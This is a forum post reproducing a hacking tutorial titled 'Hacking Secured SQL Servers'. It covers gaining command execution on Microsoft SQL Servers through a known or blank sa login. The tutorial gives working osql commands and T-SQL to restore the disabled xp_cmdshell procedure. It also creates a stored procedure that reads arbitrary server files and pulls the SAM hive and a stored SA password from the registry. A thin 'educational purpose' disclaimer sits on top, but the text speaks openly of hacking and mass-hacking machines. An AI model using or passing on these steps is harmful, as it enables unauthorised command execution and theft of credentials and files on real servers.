Jump to content
Gonzalez

Hacking Secured SQL Servers

Recommended Posts

Posted
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+This is a little Disclaimer for if you havn't read the one on our site. +
+The tools and tutorials KD-Team develops and publishes are only ment for +
+educational purpose only.WE DO NOT encourage the use of this tools and +
+tutorials for mailicious purpose.We learned a lot during the development of them +
+so we hope you also learn and don't just use it without any brains. +
+We take completly NO responsability for any damage caused by them nor +
+are we or our isp responsible for what you do with them. +
+Greetz: KD-Team +
+[url]http://www.kd-team.com[/url] +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***********************************************************************************************
*Hacking Secured SQL Servers *
*Tutorial Written By: kd-team *
*Creditz: Swiv,[url]www.google.com,www.sqlsecurity.com[/url] *
*Use on you're own Risk. *
*All the things in here will only work if the corresponding .dll files exist and are original.*
***********************************************************************************************

0) Index
1) Tools Needed
2) The Easiest Way
3) Restoring xp_cmdshell
4) Reading almost any file on server
5) Reading The Registry
7) Final Words



0) Index

This tutorial is intended as a guide to hack the secured sql servers. Conentrating on the well
known SQL_ERROR respons.
This means:

- Hack sql servers that has only got a normmal user pass
- Hack sql servers where the stored proceduure xp_cmdshell has been disabled

This DOESN'T mean:

- Hack sql servers where the .dll has been changed or switched with another one.
- Explaining how to bruteforce sql server aaccounts

Hope this tutorials is ofany use to those who want hack more things or just want to know things.
Plz bitch about this tut if things don't work but don't start bitching that it is to slow
to hack more then 10 machines a day.

I also want to thank Swiv for his time to answer my question and to his portion of contribution to this
tutorial.

1) Tools Needed

- A server with port 1433 open and the corrrect username/password
- osql.exe
- sqlexec.exe written by sunx (the 1 with tthat has the green apple as icon)

ALSO keep in mind that all of the given commands only work if they are enabled else it will fail
*********************************************************************************************************
2) The Easiest Way

First of all make shure you use the correct sqlexec version and not "sqlexec for nethacker 1.0"
So use sqlexec.exe that has a green apple als icon.
When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1.0" hasn't got
that is the format field. In that combobox (that is empty when opening the app) you can select 4 ways
of sending the data to the sql server.

The options:

1 xp_cmdshell"%s"
2 select * from openrowset etc
3 create procedure #proc_temp etc
4 %s


Option 1 is the same as in "sqlexec for nethacker 1.0" So when "sqlexec for nethacker 1.0" gives a
SQL_ERROR this app wil do also BUT when selecting option 2 most of the time you will be able to hack
the server in normal way.
*********************************************************************************************************
3) Restoring xp_cmdshell

Restoring xp_cmdshell seems like difficult task but in fact it is easy.
first of all this only works when the stored procedure xp_cmdshell is dropt if the .dll has been changed
then it won't work.
Tis is only intended when the easy way doesn't work but most of the time it does.

Put the following in a .txt(example: restore.txt) and save it in te same directory as osql.exe is

//////////////////////////////////////////////////////////////////////////////////////////////////////
use master /
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'/
go /
//////////////////////////////////////////////////////////////////////////////////////////////////////

The above path depends on the installation of MSSQL so it can be different under some circumstances.
when done execute osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txt

Now if everything went how it is supposed to go, the xp_cmdshell is enabled again and you can use option
1 from sqlexec or the other app to hack the machine.

If you want to view all stored procedure on the server currently in youre power execute osql like:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_stored_procedures"

Keep in mind that this also has got procedures made by a admin and maybe hasn't got the standard ones.
*********************************************************************************************************
4) Reading almost any file on server

I say any because sometimes when the file is to big it refuses to read it. It also refuses to read when
the file is in use.
First of all check if the file is on the server before attempting to read it for that execute osql like:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net.exe'"

If the file exists it will give back some numbers meaning filesize,date etc.

When teh respond was a positive repost put the following in a .txt(example: read.txt) and make shure it
is in the same folder as osql.exe

////////////////////////////////////////////////////////
Create proc sp_readTextFile @filename sysname /
as /
begin /
set nocount on /
Create table #tempfile (line varchar(8000)) /
exec ('bulk insert #tempfile from "' + @filename + '"')/
select * from #tempfile /
drop table #tempfile /
End /
go /
////////////////////////////////////////////////////////

when done execute osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -i read.txt

You have now succesfully created a stored procedure to read files.Now how doyou read files with it?
Very simple use osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile.txt

Then just browse to youre local C: and there you will find the file.Only problem is there will be a lot
of wite stripes and "-" character that is the normal sql output way I can't do anything about that.
*********************************************************************************************************
5) Reading The Registry

Reading the registry cna be handy when there is valuable information stored into it like passwords or
usernames.
I'll give a little example on how to read the sam file just take 1 note even if you read the sam file on
a win2k machine it is useless because of the standard security it has. Explanation on what you can do
with registry reading will be explained later.

Fire up osql.exe and execute it like this:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread ‘HKEY_LOCAL_MACHINE’, ‘SECURITY\SAM\Domains\Account’, ‘F’"

and in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5

the password of the SA user is stored in plain text could be handy if you hack a machine that has sql
running and the hack has got no super user rights like IISMEDIA exploit. then just grab the sql pass
from the registry.
*********************************************************************************************************
6) Final Words

Hope this has been of some help I can give NO garantee everything in here will work under different
circumstances. But all citics are welcome.
Further I have spend some time investigating all this and trying to explain it in a simple as possible way
so I say again don't bitch if this ain't good enough for mass-hacking.
For the rest keep learning and finding out things peeps Hacking is something you gotta feel.
Don't be lame, don't be lazy try thinigs yourself it really pays back.
1 final note:
I did not give scenario's and solutions on purpose I hope that with he info that is in this paper
you all will have enough imagination to hack something with it. Maybe later on I will make a scenario
and solutions paper about this.

Greetz,

kd-team

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...